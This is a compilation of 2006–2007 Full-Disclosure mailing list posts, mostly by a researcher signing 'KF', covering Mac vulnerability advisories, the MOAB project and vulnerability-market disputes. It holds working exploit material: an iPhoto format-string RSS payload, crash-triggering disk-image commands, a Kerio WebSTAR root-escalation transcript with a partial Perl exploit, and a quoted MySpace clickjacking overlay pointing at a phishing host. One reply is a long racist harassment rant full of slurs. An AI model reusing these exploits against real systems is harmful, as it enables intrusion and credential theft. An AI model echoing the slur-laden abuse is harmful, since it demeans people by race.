[Full-disclosure] Remove all admin-root authorization prompts from OSX
http://www.petitiononline.com/31337OSX/petition.html -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SERIOUS PROBLEM WITH MACOS V+V HAHAHA
Awe... someones mad that their penis isn't even half black. I get 2 extra inches of cock for being 1/2 black. The usual 3 inches did not apply for me since I am not totally black. Go look up the word Sarcasm before you sign the petition... in fact here is a link for ya. http://www.answers.com/sarcasmr=67 Btw dipsit... learn to read press releases. The broker is Adriel , not me. I technically left SNOSoft years ago. I am nothing more than a lowly researcher calling out iDefense on their bullshit vuln prices. You really haven't said anything here that wasn't already covered in h0h0 #3 ... Thanks -KF [EMAIL PROTECTED] wrote: HOLY FUCK SHIT DUDES CHECK OUT THIS!!! http://lists.grok.org.uk/pipermail/full-disclosure/2007- January/052002.html SERIOUSLY KF WHAT THE FUCK YOU DUMB FUCKING NIGGER GO PRETEND THAT YOU'RE A BIG TIME VULN DEALER BY BEING A BROKER TO A BROKER AND CONTINUING YOUR BROKER IN THE MIDDLE ATTACKS. I BET THE HBGARY DUDES LAUGH THEIR ASSES OFF AT YOUR NIGGER SELF FOR THIS POST. IF YOU WERE HALF THE HACKER YOUR BLACK HALF ISN'T DON'T YOU THINK YOU COULD ACTUALLY MAKE MONEY YOURSELF INSTEAD OF TRYING TO SCAM OFF OF OTHER PEOPLE WHO MIGHT BE SLIGHTLY MORE CAPABLE OF DOING SECURITY RESEARCH?? YOUR SKIN IS MORE NIGGER THAN YOUR TECHNICAL SKILLS. WAY TO RIP OFF A CROSSDRESSING HOMOSEXUAL RETARD AND GET OWNED THEN TRY TO USE IT AS AN EXAMPLE OF YOU BEING ABLE TO SELL BUGS YOU WORTHLESS TWAT SHIT. I BET YOUR MOTHER HAD HORRIBLE DIARRHOEA DURING YOUR BIRTH AND NO ONE COULD TELL YOU WERE BORN SO YOU SPENT THE FIRST HOURS OF YOUR LIFE DROWNING IN THE OUTHOUSE. ps: snosoft is going to try to sell your exploits to hbgary, so just fucking bypass snosoft and contact them directly and make more money pps: kf is a nigger ppps: kf claims he is only 1/2 nigger does this mean he is also a failure at being a nigger TOTAL FAILURE AT COMPUTER SECURITY AND TOTAL FAILURE AT BEING A NIGGER!!! WHAT A NIGGER!! Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SERIOUS PROBLEM WITH MACOS V+V HAHAHA
btw... nice pussy ass hushmail account. -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SERIOUS PROBLEM WITH MACOS V+V HAHAHA
Sure... I was aware of an opening and inquired about it as I was trying to offload the Veritas bug perhaps? I am pretty sure I never directly applied for it or even took an interview for it. In reality I was not willing to relocate thus the position was not even an after thought. hrmm how about those hushmail accounts. -KF can you at least publicly admit that you tried to get a job at idefense? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Grab a myspace credential
http://www.ninjahype.org/mov/ nameHREFTrack -KF wac wrote: On 1/16/07, *Deepan* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote: but at some point all this abuse will likely start sending users off to another service. thats only --if the know if they are being abused.. most of them are not coherent about any such issues.. On 1/15/07, Kevin Pawloski [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: The level of phishing sites targeting MySpace and bot related It is not quiet easy to fool 56000+ users using phishing sites. I wonder how Mark is doing it. Hmm... Oh no is very easy, yes very easy what he is doing. He left some traces on some of the cracked accounts, I was expectig of somebody to comment earlier since I've been a couple of hours since the initial post. When you modify a profile you can add this to the data of the profile, you know those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account :P HOLAa style=text-decoration:none;position: absolute;top:1px;left:1px; href=http://marcolano.com/login/;img style=border-width:0px;width:2024px; height:1768px; src=http://x.myspace.com/images/clear.gif;/aa style=text-decoration:none;position: absolute;top:1px;left:1px; href=http://marcolano.com/login/;img style=border-width:0px;width:2024px; height:1768px; src=http://x.myspace.com/images/clear.gif;/aembed allowScriptAccess=never allowNetworking=internal enableJSURL=false enableHREF=false saveEmbedTags=true src=http://www.../mov/cid_3277_f.mov; width=1 height=1 As you might see, this creates a huge invisible link in the page in front of everything, so when you click into anything on the page like a link or anything it will take you to that phising website so ppl beleive that the account expired and enter their user+pass. Now I beleive that his message was a way to tell about a BUG in myspace that should filter that content and it is not doing it. So... we are in fact not talking about a stupid phishing website for those who still beleive that. Regards Waldo activity that has been targeting MySpace lately is pretty alarming. Granted there is no real financial risk if an account gets compromised for the user but at some point all this abuse will likely start sending users off to another service. Kevin On 1/15/07, North, Quinn [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: [EMAIL PROTECTED] :doyouhonestlythinkiwillputmyrealpass wordhere ...at least there is some hope left in the world :-\ --=Q=-- -Original Message- From: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] [mailto: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]] On Behalf Of Emma Perdue Sent: Monday, January 15, 2007 7:48 AM To: full-disclosure@lists.grok.org.uk mailto:full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Grab a myspace credential 56000+ and counting http://www.marcolano.com/login/myspace.txt -- *Emma aka TINK* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- --- Regards Deepan Chakravarthy N
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
[EMAIL PROTECTED] wrote: I agree with you KF , that's why I do not recommand iDEFENSE in my forum's footer since some times now. They are just playing on the fact they are alone , or they were alone for a long time on this market, and they do not wish to do any effort, making loads of dollars with us , to say clean , they sucks. AD I am pretty sure no one noticed that I chose to gpg encrypt the Veritas exploits with lines from Pop Goes the Weasel last year... 22. VERITAS-Linux.pl.gpg - 'Veritas NetBackup = 6.0 (bpjava-msvc) Remote Exploit (linux)' pass: allaroundthemulberrybush 21. VERITAS-OSX.pl.gpg - 'Veritas NetBackup = 6.0 (bpjava-msvc) Remote Exploit (OSX)' pass: themonkeychasedtheweasel 20. VERITAS-WIN32.pl.gpg - 'Veritas NetBackup = 6.0 (bpjava-msvc) Remote Exploit (WIN32)' pass: apennyforaneedle check the interpretations section on Wikipedia for a hint as to why I may have done that. (hint: it has something to do with getting paid in peanuts!). http://en.wikipedia.org/wiki/Pop_Goes_the_Weasel -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
No offense to iDefense as I have used their services in the past... but MY Q1 2007 Challenge to YOU is to start offering your researchers more money in general! I've sold remotely exploitable bugs in random 3rd party products for more $$ than you are offering for these Vista items (see the h0n0 #3). I really think you guys are devaluing the exploit market with your low offers... I've had folks mail me like WOW iDefense offered me $800 for this remote exploit. Pfffttt not quite. We all know black hats are selling these sploits for =$25k so why should the legit folks settle for anything less? As an example the guys at MOAB kicked around selling a Quicktime bug to iDefense but in the end we decided it was not worth it due to low pay... Low Pay == Not getting disclosed via iDefense -KF I know someone who will pay significantly more per vulnerability against the same targets. On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Also available at: http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+chall enge *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in Vista IE 7.0* Both Microsoft Internet Explorer and Microsoft Windows dominate their respective markets, and it is not surprising that the decision to update to the current release of Internet Explorer 7.0 and/or Windows Vista is fraught with uncertainty. Primary in the minds of IT security professionals is the question of vulnerabilities that may be present in these two groundbreaking products. To help assuage this uncertainty, iDefense Labs is pleased to announce the Q1, 2007 quarterly challenge. Remote Arbitrary Code Execution Vulnerabilities in Vista and IE 7.0 Vulnerability Challenge: iDefense will pay $8,000 for each submitted vulnerability that allows an attacker to remotely exploit and execute arbitrary code on either of these two products. Only the first submission for a given vulnerability will qualify for the award, and iDefense will award no more than six payments of $8000. If more than six submissions qualify, the earliest six submissions (based on submission date and time) will receive the award. The iDefense Team at VeriSign will be responsible for making the final determination of whether or not a submission qualifies for the award. The criteria for this phase of the challenge are: I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Vulnerability Challenge Ground Rules: - -The vulnerability must be remotely exploitable and must allow arbitrary code execution in a default installation of one of the technologies listed above - -The vulnerability must exist in the latest version of the affected technology with all available patches/upgrades applied - -'RC' (Release candidate), 'Beta', 'Technology Preview' and similar versions of the listed technologies are not included in this challenge - -The vulnerability must be original and not previously disclosed either publicly or to the vendor by another party - -The vulnerability cannot be caused by or require any additional third party software installed on the target system - -The vulnerability must not require additional social engineering beyond browsing a malicious site Working Exploit Challenge: In addition to the $8000 award for the submitted vulnerability, iDefense will pay from $2000 to $4000 for working exploit code that exploits the submitted vulnerability. The arbitrary code execution must be of an uploaded non-malicious payload. Submission of a malicious payload is grounds for disqualification from this phase of the challenge. I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Working Exploit Challenge Ground Rules: Working exploit code must be for the submitted vulnerability only iDefense will not consider exploit code for existing vulnerabilities or new vulnerabilities submitted by others. iDefense will consider one and only one working exploit for each original vulnerability submitted. The minimum award for a working exploit is $2000. In addition to the base award, additional amounts up to $4000 may be awarded based upon: - -Reliability of the exploit - -Quality of the exploit code - -Readability of the exploit code - -Documentation of the exploit code
[Full-disclosure] DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerabiity and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS
I've been subject to a few DoS attacks as of late so these did not quite make it out. Enjoy the typos as usual. =P -KF DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS' Author: Kevin Finisterre Vendor(s): http://www.apple.com Product: '= OSX 10.4 (?)' References: http://www.digitalmunition.com/DMA[2007-0109a].txt http://www.apple.com/macosx/features/finder/ http://projects.info-pull.com/moab/MOAB-09-01-2007.html Description: Your home on the Mac, Finder gives you lots of options for locating, displaying and organizing all your files and folders. From the power of Spotlight search technology to the flexibility of customizable item views, Mac OS X Finder truly shows your Mac at a glance. You can really piss Finder off in several ways by passing long volume labels to various types of disk images. Here is the hex dump of an example label that can be used to trigger the issue. 0009c00: 4c41 424c be42 0001 4594 86e1 LABL.B..E... 0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141 ..AA 0009c20: 4141 4141 4141 4141 4141 4141 4141 4141 0009c30: 4141 4141 4141 4141 4141 4141 4141 4141 0009c40: 4141 4141 4141 4141 4141 4141 4141 4141 0009c50: 4141 4141 4141 4141 4141 4141 4141 4141 0009c60: 4141 4141 4141 4141 4141 4141 4141 4141 0009c70: 4141 4141 4141 4141 4141 4141 4141 4141 0009c80: 4141 4141 4141 4141 4141 4141 4141 4141 0009c90: 4141 4141 4141 4141 4141 4141 4141 4141 0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141 0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141 0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141 0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141 0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141 0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141 0009d00: 4141 4141 4141 4141 4141 4141 4141 4141 0009d10: 4100 A... Creating the images is something fairly easy to do. $ hdiutil create -sectors 31337 -type SPARSE -fs HFS+ -volname `perl -e 'print A x 255'` -layout NONE test.sparseimage $ hdiutil create test.dmg -size 01m -fs HFS+ -volname `perl -e 'print A x 255'` $ hdiutil create test.dmg -size 200k -fs UFS -volname `perl -e 'print A x 255'` Attach gdb to Finder and open any of the above .dmg files and you will see the following crash. (gdb) bt #0 0x0ac4 in ___memcpy () at /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h:228 #1 0x90c93952 in _FSCopyExtendedAliasInfoFromAliasPtr () #2 0x9252939d in TNode::CreateVirtualAliasRecord () #3 0x92528872 in TNode::PopulateVirtualContainerFromSFL () #4 0x92513343 in TNodeSyncTask::SyncTaskProc () #5 0x90cb3f84 in PrivateMPEntryPoint () #6 0x90023d87 in _pthread_body () See Alastairs blog (http://alastairs-place.net) in about 3 days for an explaination of exploitability. Workaround: Do not mount disk images or simply disable finder and use Spotlight instead. 1. Open Terminal, found in /Applications - Utilities, and then type 'sudo mv /System/Library/CoreServices/Finder.app /Applications/' 2. Still in Terminal, type killall Finder -- this kills the process named Finder, and it should not restart! Note that this does not affect the Dock or Expos The following command will unmount a disk image in the event that your Finder has been put into a DoS condition. $ hdiutil unmount /Volumes/A/ DMA[2007-0107a] - 'OmniWeb Javascript Alert Format String Vulnerabiity' Author: Kevin Finisterre Vendor(s): http://www.omnigroup.com Product: 'OmniWeb 5.51 (?)' References: http://www.digitalmunition.com/DMA[2007-0107a].txt http://www.omnigroup.com/applications/omniweb/ http://projects.info-pull.com/moab/MOAB-07-01-2007.html http://www.omnigroup.com/applications/omniweb/download/ http://blog.omnigroup.com/2007/01/07/omniweb-552-now-available-and-more-secure/ Description: You're a Mac fan, right? When people ask you why you like the Mac, you probably think of the attention to detail that makes the Mac user experience superior. It's the sum of a lot of different things that add up to a system that's more powerful, more beautiful, and more fun. What if you thought of a web browser in the same way? You use a web browser all the time, for working, for entertainment, for research; how cool would it be if every time you used it, you thought Wow, this rules! Welcome to OmniWeb. OmniWeb elevates your web user experience to be more productive, more efficient, and more fun. You'll find information more quickly. You'll stay organized. You'll see the entire internet the way you choose. It's the browser that puts you in control. Sure, you can use a standard web
[Full-disclosure] Flaaaaaaaaaaaaaaaaavor Flav! (todays MOAB)
http://projects.info-pull.com/moab/MOAB-05-01-2007.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability'
DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability' Author: Kevin Finisterre Vendor(s): http://www.apple.com Product: 'iLife 06 (?)' References: http://www.digitalmunition.com/DMA[2007-0104a].txt http://www.apple.com/ilife/iphoto/features/photocasting.html http://projects.info-pull.com/moab/MOAB-04-01-2007.html Description: Rebuilt for blazing performance, iPhoto makes sharing photos faster, simpler, and cooler than ever before. It adds eye-opening features to the ones you already love, including Photocasting, support for up to 250,000 photos, easy publishing to the web, special effects, and new custom cards and calendars. In essence iPhoto lets you spread smiles far and wide. As easily as you can create a new photo album you can share it with friends and family thousands of miles away. A new feature in iPhoto 6, Photocasting allows .Mac members to share albums with anyone, anywhere. Say you have new photos of little Johny Pwnerseed. Place the photos you'd like to share in an album called Johny Pwnerseed's Latest Pics., then click Photocast this Album. iPhoto publishes the album, and others can subscribe to it by clicking a link in an email you send. But here's where the real fun begins. If you create a malformed XML file you can simulate the photocasting functionality in iPhoto 6 and use it to trigger a format string vulnerability. Once Aunt Sophia subscribes, the fake photos feed is automatically download into a Johny Pwnerseed's Latest Pics album that instantly triggers a format string write via %n. We're talking beautiful, full-res pwnage. Aunt Sophia is pretty much screwed if you are able to properly format your payload. ?xml version=1.0 encoding=utf-8? rss version=2.0 xmlns:aw=http://www.apple.com/ilife/wallpapers; channel title%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%n.%n.%n.%n.%n.%n/title item titleWelcome to Pwndertino!/title aw:imagehttp://www.digitalmunition.com/digital_munitions_detonator.jpg /aw:image /item /channel /rss Host Name: Aunt-Sophias-computer Date/Time: 2006-12-04 19:52:51.035 -0500 OS Version: 10.4.8 (Build 8L2127) Report Version: 4 Command: iPhoto Path:/Applications/iPhoto.app/Contents/MacOS/iPhoto Parent: WindowServer [83] Version:6.0.5 (6.0.5) Build Version: 2 Project Name: iPhotoProject Source Version: 316 PID:438 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00389ddc Thread 0 Crashed: 0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976 1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504 2 com.apple.CoreFoundation0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018 3 com.apple.CoreFoundation0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122 4 com.apple.Foundation0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162 5 com.apple.Foundation0x92678e6c +[NSString localizedStringWithFormat:] + 129 6 com.apple.iPhoto0x0002ae3a 0x1000 + 171578 7 com.apple.iPhoto0x0031298f 0x1000 + 3217807 Workaround: Unregister the iphoto:// URL handler with RCDefaultsApp Check out Landon's website... he has been on the ball the last few days. http://landonf.bikemonkey.org/ He has also set aside a google group for MOAB issues. http://groups-beta.google.com/group/moabfixes?hl=en http://www.apple.com/support/security/ http://docs.info.apple.com/article.html?artnum=61798 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Perforce client: security hole by design
Sometimes, the track record is only good because nobody looked into it. Nice quote... -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Whos Johny Pwnerseed?
You may still be scratching your head from yesterday... don't forget about today and tomorrow: http://projects.info-pull.com/moab/MOAB-02-01-2007.html -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Welcome to Pwndertino...
Just in case you are drunk / hungover / out of town or whatever... this is a friendly reminder that MOAB has begun. http://projects.info-pull.com/moab/index.html -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sacure Enterprise Security - Real Company!
Sheesh... funny that this chump said he was in with the individual that single handedly started the HP / DMCA fiasco. Since that person is most likely ME (or a former employee of mine) and I have never heard of this guy I got a good belly laugh out of this. So Jeff... do me a favor buddy... keep my name out your mouth. You don't know me (queue song by T.I). -KF [EMAIL PROTECTED] wrote: I am a CTO of a large company in NYC and have been very satisfied with Sacure Enterprise Security www.sacure.com and the staff. They were responsive, professional and credible. Initially, Jeff fed me the same lines but he was apparently fired, (sometime over the summer), and the President contacted me afterwards to follow-up. Since, I have been dealing with a new rep and have been nothing but satisfied with the professionalism at Sacure. Hope this helps. Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
a douchebag? I dunno but why the hell aren't your boxes patched to Sasser yet? -KF deep fried wrote: What am I Consultant? School Teacher? Terrorist? On 11/27/06, *K F (lists)* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kerio WebSTAR local privilege escalation
DMA[2006-1115a] - 'Kerio WebSTAR local privilege escalation'
Author: Kevin Finisterre
Vendor(s): http://www.kerio.com/webstar_home.html
Product: 'Kerio WebSTAR = 5.4.2 (?)'
References:
http://www.digitalmunition.com/DMA[2006-1115a].txt
Description:
Kerio WebSTAR is an easy-to-use web server for Mac OS X. Acquired in January
2006 from 4D, Kerio WebSTAR 5 (formerly known as 4D
WebSTAR Server Suite) helps small companies run Internet and intranet websites
and integrate them with databases.
Upon installing Kerio WebSTAR you will find that you have inherited two setuid
binaries in /Applications
kevin-finisterres-computer:~/Desktop kf$ find /Applications/Kerio\ WebSTAR
-perm -4000 -ls
978790 3016 -rwsrwx--x1 root admin 1542556 Apr 10 2006
/Applications/Kerio WebSTAR/AdminServer/WSAdminServer
979475 3288 -rwsrwx---1 root admin 1679724 Apr 10 2006
/Applications/Kerio WebSTAR/WebServer/WSWebServer
If an attacker is able to gain access to either the webstar user or the admin
group, he or she may be able to execute code as
root by abusing the binaries mentioned above. For some odd reason both binaries
try to load a helper library from within the current
directory. In most cases this is obviously not a good idea because an attacker
can simply provide the application with the trojaned
library of his choice.
kevin-finisterres-computer:~ kf$ /Applications/Kerio\
WebSTAR/WebServer/WSWebServer
dyld: Library not loaded: libucache.dylib
Referenced from: /Applications/Kerio WebSTAR/WebServer/WSWebServer
Reason: image not found
Trace/BPT trap
kevin-finisterres-computer:~ kf$ /Applications/Kerio\
WebSTAR/AdminServer/WSAdminServer
dyld: Library not loaded: libucache.dylib
Referenced from: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
Reason: image not found
Trace/BPT trap
ktrace gives a better look at what is going on...
1183 WSAdminServer CALL open(0x17e8,0,0)
1183 WSAdminServer NAMI libucache.dylib
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0x)
...
1183 WSAdminServer CALL open(0xbfffea90,0,0)
1183 WSAdminServer NAMI /var/root/lib/libucache.dylib
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0x)
1183 WSAdminServer RET close -1 errno 9 Bad file descriptor
1183 WSAdminServer CALL open(0xbfffea90,0,0)
1183 WSAdminServer NAMI /usr/local/lib/libucache.dylib
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0x)
1183 WSAdminServer RET close -1 errno 9 Bad file descriptor
1183 WSAdminServer CALL open(0xbfffeaa0,0,0)
1183 WSAdminServer NAMI /usr/lib/libucache.dylib
1183 WSAdminServer RET open -1 errno 2 No such file or directory
1183 WSAdminServer CALL close(0x)
Exploitation is pretty cut and dry, change directories to a folder that you can
write to, compile your helper library, and
take root.
kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl
Usage: ./kerio_WebSTAR_pwn.pl target
Targets:
0 . kerio-webstar-5.4.2-mac.bin - WSAdminServer
1 . kerio-webstar-5.4.2-mac.bin - WSWebServer
kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 0
*** Target: kerio-webstar-5.4.2-mac.bin - WSAdminServer, Binary:
/Applications/Kerio WebSTAR/AdminServer/WSAdminServer
/tmp/kerio_pwn.c: In function 'kerio_pwned':
/tmp/kerio_pwn.c:2: warning: incompatible implicit declaration of built-in
function 'exit'
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr),
9(procmod), 80(admin)
As mentioned previously you must be in the admin group or be the webstar user
in order to exploit this issue. If permissions
have been changed other users may be able to elevate their status to root as
well.
kevin-finisterres-computer:~ notadmin$ id
uid=505(notadmin) gid=505(notadmin) groups=505(notadmin)
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\
WebSTAR/WebServer/WSWebServer
-bash: /Applications/Kerio WebSTAR/WebServer/WSWebServer: Permission denied
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\
WebSTAR/AdminServer/WSAdminServer
-bash: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer: Permission denied
Workaround:
Kerio has been contacted, fixes will be available soon. In the mean time limit
access to the admin group and the webstar user.
Please chmod -s /Applications/Kerio WebSTAR/AdminServer/WSAdminServer and
/Applications/Kerio WebSTAR/WebServer/WSWebServer
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# you must have access to the webstar user or be in the admin group
#
# This is currently not patched... chmod -s your kerio binaries
foreach $key (keys %ENV) {
delete $ENV{$key};
}
$tgts{0} = kerio-webstar-5.4.2-mac.bin - WSAdminServer:/Applications/Kerio
[Full-disclosure] DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
This was supposed to go out on Halloween but it didn't... but either way
all you Mac users can get scared or something. OOGA BOOGA!
pwntego.tar.gz
Description: GNU Zip compressed data
DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com
Product: 'Intego VirusBarrier X4 = VirusBarrierX47070.dmg'
References:
http://www.digitalmunition.com/DMA[2006-1031a].txt
Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security
solution for Macintosh computers, by Intego, the
leading publisher of personal security software for Macintosh. It offers
thorough protection against viruses of all types, coming
from infected files or applications, whether on CD-ROMs, DVDs or other
removable media, or on files downloaded over the Internet
or other types of networks.
Intego VirusBarrier X4 protects your computer from viruses by constantly
examining all the files that your computer opens and
writes, as well as watching for suspicious activity that may be the sign of
viruses acting on applications or other files. With
Intego VirusBarrier X4 on your computer, you can rest assured that your
Macintosh has the best protection available against
viruses of all kinds.
Although VirusBarrier does a pretty good job of halting malicous activity the
product currently suffers from a flaw related to the
amount of alerts that it can process simultaneously. If an attacker is able to
trigger multiple alerts in succession within a very
short amount of time he or she may be able cause VirusBarrier to completely
ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or further
spreading of malware.
As an example we will show how VirusBarrier normally stops a local root exploit
with behavior similar to 'OSX.ExploitMachex.A', then
we will demonstrate how the VirusBarrier protection can be bypassed by using a
simple flood of Eicar Test files.
Any typical attempt to access or execute a file or program that is a match for
a VirusBarrier definition results in an alert on the
user interface. There is a sweet lookin insulin bottle on the screen that
slowly empties as the virus nears eradication.
'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do
('Ignore' || 'Repair')?
Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus
program existed at all.
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr),
80(admin)
On the other hand if you chose 'Repair' the process is terminated dead in its
tracks and the file is nulled out:
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit
The above output demonstrates how Virusbarrier is supposed to work. Under
normal circumstances this would be adequate to stop a
malicious attack.
If however an attacker floods the file system with dummy virus files at a quick
rate the VirusBarrier software will promptly stop
responding after presenting the user with a few audible and visual alerts.
After about 40 some odd infected files in a row the
system will become confused and in some cases VirusBarrier may stop responding
completely. (Intego confirmed a limit of 20 files)
When under attack the user may see dozens of messages on the screen. With our
example code the messages are similar to the following:
